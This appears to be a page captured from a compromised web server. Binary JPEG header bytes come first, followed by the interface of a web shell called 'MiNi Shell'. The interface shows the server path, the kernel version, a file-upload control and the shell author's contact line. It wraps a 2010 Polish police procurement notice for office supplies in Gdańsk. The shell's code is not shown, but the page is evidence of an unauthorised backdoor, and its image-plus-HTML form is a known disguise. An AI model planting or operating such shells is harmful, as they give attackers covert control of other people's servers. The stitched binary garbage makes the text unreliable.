JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100316/57651-N-2010.html

<p class="kh_header"><b>Gdańsk: Dostawa  materiałów kancelaryjno-biurowych na potrzeby garnizonu pomorskiego</b><br>
<b>Numer ogłoszenia: 57651 - 2010; data zamieszczenia: 16.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Gdańsku , ul. Okopowa 15, 80-819 Gdańsk, woj. pomorskie, tel. 058 3214817, faks 058 3214810.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorska.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  materiałów kancelaryjno-biurowych na potrzeby garnizonu pomorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> L.p	Asortyment	J.m	Ilość	Uwagi 
opis asortymentu zamiennego


1	Cienkopis typu Pelikan 96F - oprawiona metalowa końcówka; grubość linii 0,4mm, specjalna skuwka chroniąca przed wysychaniam - dostępność w 4 kolorach 	szt.	3 000	czarny i niebieski po 1 000szt.,zielony i czerwony po 500szt.
2	Datownik samotuszujący typu Trodat 4810, wysokość czcionki dokładnie 3,8 mm, data w wersji ISO i polskiej 	szt.	15	

3	Długopis żelowy z wymiennym wkładem, trwała przezroczysta obudowa, miękki gumowy uchwyt oraz wykończenia w kolorze wkładu, długość pisania 800m, grubość linii 0,5mm 	szt.	2 000	niebieski 1 500 szt czerwony 300szt. Zielony 200szt.

4
	Wkład do długopisu j.w. - kolor niebieski 	szt.	500	
5	Długopis typu Lexi - skuwka w kolorze wkładu długopisu, grubość kulki 0,7mm, długość linii pisania 1 500m, wymienny wkład 	szt.	8 000	niebieski 6 000szt. Czarny 1 000szt. czerwony i zielony po 500szt
6	Długopis typu Toma - automatyczny, grubość kulki do 0,5 mm, obudowa gwiazdki, długość linii pisania min. 4000 mb, kolory czarny i niebieski 	szt.	5 000	niebieski 4 000szt. Czarny 1 000szt.

7	Dziurkacz metalowy na min. 30 kartek, głębokość wsuwania kartek 12 mm, mocna, stabilna konstrukcja, blokada położenia dźwigni, listwa formatowa, antypoślizgowa nakładka na dźwigni, 5 lat gwarancji 	szt.	15	
8	Gumka ołówkowa do ścierania, miękka, nadająca się do wszelkiego rodzaju powierzchni, o wymiarach min.: długość 6 cm, szerokość 2 cm, grubość 1,2 cm 	szt.	150	

9	Karteczki samoprzylepne 76x76, 100 kartek w bloczku, 12 notesików w zgrzewce 	op.	50	

10
	Bezbarwny klej do papieru w płynie min. 50ml, typu Donau, wyposażony w metalową kulkę do nanoszenia kleju 	szt.	1 000	
11	Klej w sztyfcie 36g 	szt.	2 000	
12	Klej uniwersalny w tubie do klejenia papieru i tektury; tuba 40ml	szt.	1 000	

13	Klej termoaktywny w sztabkach 11,2 x 200 mm przezroczysty do pistoletów - klejarek do papieru 	szt.	1 500	
14	Koperty małe s k C6 114x162mm białe 	kart.	450	kart.=1000 szt.
15
	Koperty średnie s k B5 176x250mm szare 	kart.	280	kart.=500 szt.

16
	Koperty średnie s/k B5 176x250mm białe 	kart.	5	kart.=500 szt.
17	Koperty aktowe s/k C4 250x353mm brąz 	kart.	200	kart.=250 szt.
18	Koperty E4 280x400mm s k brąz 	kart.	10	kart.=250 szt.
19	Koperty z rozszerzalnym dnem i bokiem s k 250x40x353mm brąz 	kart.	10	kart.=250 szt.
20	Koperty aktowe s k B4 250x353mm białe 	kart.	5	kart.=250 szt.

21	Korektor w taśmie typu Toma - rozmiar: 5mmx8m, kolor taśmy biały, system kontroli naprężenia taśmy, do korygowania na różnych rodzajach papieru 	szt.	50	

22
	Korektor w płynie z pędzelkiem, z rozpuszczalnikiem, szybkoschnący, przeznaczony do wszystkich rodzajów powierzchni (kpl zawiera: korektor poj. 20ml i rozpuszczalnik poj.20 ml) 	kpl	50	
23	Koszulka krystaliczna A4, typu Esselte, o grubości min. 55 mikronów, op 100 szt.	opak.	300	
24	Linijki plastikowe 30cm 	szt.	100	

25	Linijki plastikowe 50cm 	szt.	100	
26	Marker permanentny typu Snowman z okrągłą lub ściętą końcówką, do pisania na każdej powierzchni, kolory: czarny, niebieski, czerowny, zielony	szt.	1 500	czarny i niebieski po 500 szt., czerwony i zielony po 250 szt.

27	Nożyczki biurowe o długości 16 cm, czarne niełamliwe rączki 	szt.	50	

28
	Nożyczki biurowe o długości 20,5 cm, czarne niełamliwe rączki 	szt.	50	
29	Ołówek zwykły HB biurowy 	szt.	1 000	
30	Papier do faksu 100mbx210mmx1 - typu Emerson 	rolka	200	
31	Papier do faksu 30mbx 210mmx1 - typu Emerson 	rolka	300	
32	Papier do faksu 50mbx210mmx1 - typu Emerson 	rolka	50	

33	Papier pakowy szary 	kg	20	

34
	Plastelina po 8szt w opak. 	opak.	200	
35	Poduszka do stempli typu Trodat 110x70mm nasączona, w kolorach: czarny, niebieski, czerwony, zielony	szt.	100	czarny, niebieski po 30 szt., czerwony, zielony po 20 szt.
36	Rolka termiczna do maszyn liczących - 57mm x 20m typu Emerson 	rolka	100	

37	Rozszywacz uniwersalny 	szt.	20	
38	Segregator z mechanizmem ekonomicznym, gruby karton pokryty poliolefiną, dwustronna etykieta, dolne krawędzie wzmocnione A4 75mm z dżwignią, kolorowe	szt.	1 000	kolory: niebieski, czerwony, zielony, żółty - z każdego po 250 szt.
39
	Skoroszyt A4 kartonowy 	szt.	4 000	
40

	Skoroszyt A4, tekturowy połówka, zawieszkowy 	szt.	400	
41	Skoroszyt A4, z PCV, wpinany, przód wykonany z przezroczystej folii, kieszonka na opis, rózne kolory 	szt.	300	
	Skorowidz A4 , twarde okładki, szyte, 96 kart 	szt.	50	
42	Skorowidz A5, twarde okładki, szyte, 96 kart 	szt.	50	
43	Spinacz krzyżowy o wys. 41mm po 50szt. w opak. 	opak.	50	
44
	Spinacz T 28 po 100szt. w opak. 	opak.	5 000	
45

	Nici lniane - dratwa; 25dag 	szt.	300	
46	Taśma klejąca przezroczysta, szerokość minimum 24mm, długość 30mb, po 8 szt. w opak. 	opak.	625	
47	Taśma papierowa biała do maszyn liczących 57mm/30m 	rolka	200	
48
	Taśma pakowa brązowa 48mmx66m 	szt.	300	
49	Teczka do podpisu A4 typu Donau, posiada okienko na wymienną etykietę na nazwisko, 20 przegródek ułatwiających umieszczanie dokumentów, 4 specjalne otwory na każdej stronie 	szt.	30	
50	Teczka tekturowa wiązana 350 g - tasiemki bawełniane długie 	szt.	40 000	
51	Temperówka - kostka metalowa pojedyncza 	szt.	100	
52	Tusz wodny do stempli, minimum 25 ml, nakrętka butelki w kolorze tuszu, czarny, niebieski, czerwony, zielony 	szt.	350	czarny i niebieski po 100szt., czerwony i zielony po 75szt.
53	Zakreślacz typu Donau, rubość linii pisania 1-5 mm, długość linii pisania do 140 m, gumowane boki zapobiegające wyślizgiwaniu się zakreślacza z dłoni, dostepność w 5 różnych kolorach 	szt.	350	Zółty, zielony, różowy, pomarańczowy po 80szt., czerwony po 30 szt.
54	Zeszyt A5, kratka, 60kartkowy 	szt.	200	
55	Zeszyt j.w., twarda okładka, 96k. 	szt.	200	
56	Zeszyt akademicki A4, kratka, twarda okładka, szyty 96k. 	szt.	500	
57	Zszywacz metalowy, na minimum 30 kartek zszycia, na zszywki 24/6 i 26/6, maksymalna głębokość wsuwania kartek 60 mm, ilość zszywek w magazynku 80 szt. 	szt.	50	
58	Zszywki metalowe 24 6 w pudełeczkach a 1000 szt. 	pudeł.	4 000	
59	Cienkopis typu Pelikan 96F - oprawiona metalowa końcówka; grubość linii 0,4mm, specjalna skuwka chroniąca przed wysychaniam - dostępność w 4 kolorach 	szt.	3 000	czarny i niebieski po 1 000szt.,zielony i czerwony po 500szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Druk ofertowy wraz z oświadczeniem o podwykonawcach
    2 W przypadku ustanowienia pełnomocnika do reprezentowania w postępowaniu do oferty należy dołączyć pełnomocnictwo
 3.W przypadku złożenia oferty równoważnej należy opisać asortyment zamienny /typ, nazwę i symbol produktu./</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorska.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekcja Zamówień Publicznych KWP w Gdańsku ul. Biskupia 23, 80-875 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2010 godzina 09:50, miejsce: Sekcja Zamówień Publicznych KWP w Gdańsku ul. Biskupia 23, 80-875 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com